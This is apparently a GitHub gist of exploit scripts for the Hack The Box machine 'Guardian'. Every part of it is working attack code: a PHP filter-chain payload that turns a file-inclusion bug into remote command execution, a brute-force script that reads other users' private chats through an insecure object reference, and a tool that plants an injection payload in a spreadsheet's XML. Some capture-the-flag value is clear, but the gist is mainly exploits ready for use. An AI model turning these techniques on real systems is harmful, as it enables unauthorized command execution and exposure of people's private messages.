Skip to content

Instantly share code, notes, and snippets.

@sharpicx
Last active November 8, 2025 06:32
Show Gist options
  • Save sharpicx/d0a5d1d7af54c733cf9875c8f146631a to your computer and use it in GitHub Desktop.
HTB: Guardian
import requests
from bs4 import BeautifulSoup
from pwn import log
import sys, string
def exec(data):  # NOTE(review): shadows the builtin `exec`; name kept so callers keep working
    """Run *data* as a shell command on the target and return its cleaned output.

    Exploits an LFI in ``/admin/reports.php`` via a php://filter iconv
    conversion chain (wrapper-chain RCE): the chain decodes to a PHP stub
    that executes the command supplied in the extra ``&0=`` query parameter.

    :param data: shell command to execute on the remote host.
    :return: printable command output with filter-chain artefacts stripped.
    """
    # The filter chain is machine-generated (php_filter_chain_generator style)
    # and must be preserved byte-for-byte -- any edit breaks the decoding.
    payload = "http://portal.guardian.htb/admin/reports.php?report=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://tempfinancial.php&0="
    cookies = {
        # Valid authenticated admin session -- refresh before each run.
        "PHPSESSID": "d4bbvc2v9n41tts9jtqn2ef1g7",
    }
    resp = requests.get(payload + data, cookies=cookies)
    soup = BeautifulSoup(resp.text, "html.parser")
    # Command output is emitted as the raw text node immediately following
    # the first <div class="grid"> of the rendered report page.
    grid_div = soup.find("div", class_="grid")
    raw_text = grid_div.next_sibling.strip()
    # Drop non-printable bytes left over by the iconv conversions.
    printable = "".join(ch for ch in raw_text if ch in string.printable)
    # Strip the ISO-2022-KR escape artefact the filter chain prepends.
    return printable.replace("$)C@C>==@C>==@C>==@C>==@C>==@", "")
if __name__ == "__main__":
    # Usage: python exploit.py '<cmd>'
    if len(sys.argv) != 2:
        log.warning(f"usage: {sys.argv[0]} <cmd>")
        sys.exit(1)
    cmd = sys.argv[1]
    # BUGFIX: original line was `log.success(exec(cmd)` -- unbalanced
    # parentheses made the script a SyntaxError; closing paren restored.
    log.success(exec(cmd))
import requests
from bs4 import BeautifulSoup
from pwn import log
COOKIE = {
    # Authenticated student session -- refresh before each run.
    "PHPSESSID": "9dag3546f0bc1mq3luo10r3gaa",
}
# ANSI colour codes for readable terminal output.
RED = "\033[91m"
CYAN = "\033[96m"
RESET = "\033[0m"

# IDOR brute-force: chat.php trusts the caller-supplied chat_users[] IDs,
# so an authenticated student can dump any pair's conversation. Enumerate
# every (i, b) pair of user IDs in 1..49.
for i in range(1, 50):
    for b in range(1, 50):
        TARGET = (
            "http://portal.guardian.htb/student/chat.php?chat_users[0]=%d&chat_users[1]=%d"
            % (i, b)
        )
        response = requests.get(TARGET, cookies=COOKIE).text
        soup = BeautifulSoup(response, "html.parser")
        for bubble in soup.select(".chat-bubble"):
            header = bubble.select_one(".text-sm.text-gray-500.mb-1")
            body = bubble.select_one(".text-gray-800")
            # Skip malformed bubbles missing either the sender header
            # or the message body.
            if not header or not body:
                continue
            # First text node of the header is the sender name.
            sender = header.contents[0].strip()
            # BUGFIX(minor): reuse the already-selected `body` node instead
            # of running the identical select_one() query a second time.
            message = body.get_text(strip=True)
            log.success(f"{RED}{sender}{RESET}: {CYAN}{message}{RESET}")
import html
import os
import re
import shutil
import sys
import zipfile

from pwn import log
if __name__ == "__main__":
    # Usage: python inject.py <xlsx> <payload>
    # Unpacks an .xlsx, replaces the marker string "sharpicx" with an
    # attribute-escaping payload, and repacks it as Book1_modifed.xlsx.
    if len(sys.argv) != 3:
        log.info(f"usage: {sys.argv[0]} <xlsx> <payload>")
        sys.exit(1)

    xlsx_file = sys.argv[1]
    # BUGFIX: the original fell through with folder_name == "" when this
    # check failed and still ran the repack step; bail out early instead.
    if not (os.path.isfile(xlsx_file) and xlsx_file.lower().endswith(".xlsx")):
        log.info(f"not an .xlsx file: {xlsx_file}")
        sys.exit(1)

    folder_name = os.path.splitext(os.path.basename(xlsx_file))[0]
    os.makedirs(folder_name, exist_ok=True)
    with zipfile.ZipFile(xlsx_file, "r") as zip_ref:
        zip_ref.extractall(folder_name)
    log.success(f"Extracted {xlsx_file} to {folder_name}")

    search_term = "sharpicx"
    # The '">' prefix closes the surrounding XML attribute before the
    # payload; html.escape() keeps the document well-formed XML.
    replaced_term = html.escape(f'">{sys.argv[2]}')
    # Compile once, outside the walk loop.
    pattern = re.compile(re.escape(search_term), re.IGNORECASE)

    for subdir, _, files in os.walk(folder_name):
        for file in files:
            file_path = os.path.join(subdir, file)
            try:
                with open(file_path, "r", encoding="utf-8") as f:
                    content = f.read()
            except (OSError, UnicodeDecodeError):
                # Binary archive members (images, etc.) -- skip.
                continue
            if search_term.lower() in content.lower():
                new_content = pattern.sub(replaced_term, content)
                with open(file_path, "w", encoding="utf-8") as f:
                    f.write(new_content)
                log.success(f"Updated: {file_path}")

    # BUGFIX: repack with zipfile instead of an os.system() shell pipeline.
    # The original interpolated folder_name into a shell string (injection-
    # prone) and hard-coded "rm -rf Book1", deleting the wrong directory
    # for any input not named Book1.xlsx. Output filename kept as-is
    # ("Book1_modifed.xlsx", sic) for compatibility with existing usage.
    out_name = "Book1_modifed.xlsx"
    with zipfile.ZipFile(out_name, "w", zipfile.ZIP_DEFLATED) as zf:
        for subdir, _, files in os.walk(folder_name):
            for file in files:
                file_path = os.path.join(subdir, file)
                # Store paths relative to the unpack dir, matching the
                # original "cd folder; zip -r" archive layout.
                zf.write(file_path, os.path.relpath(file_path, folder_name))
    shutil.rmtree(folder_name)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment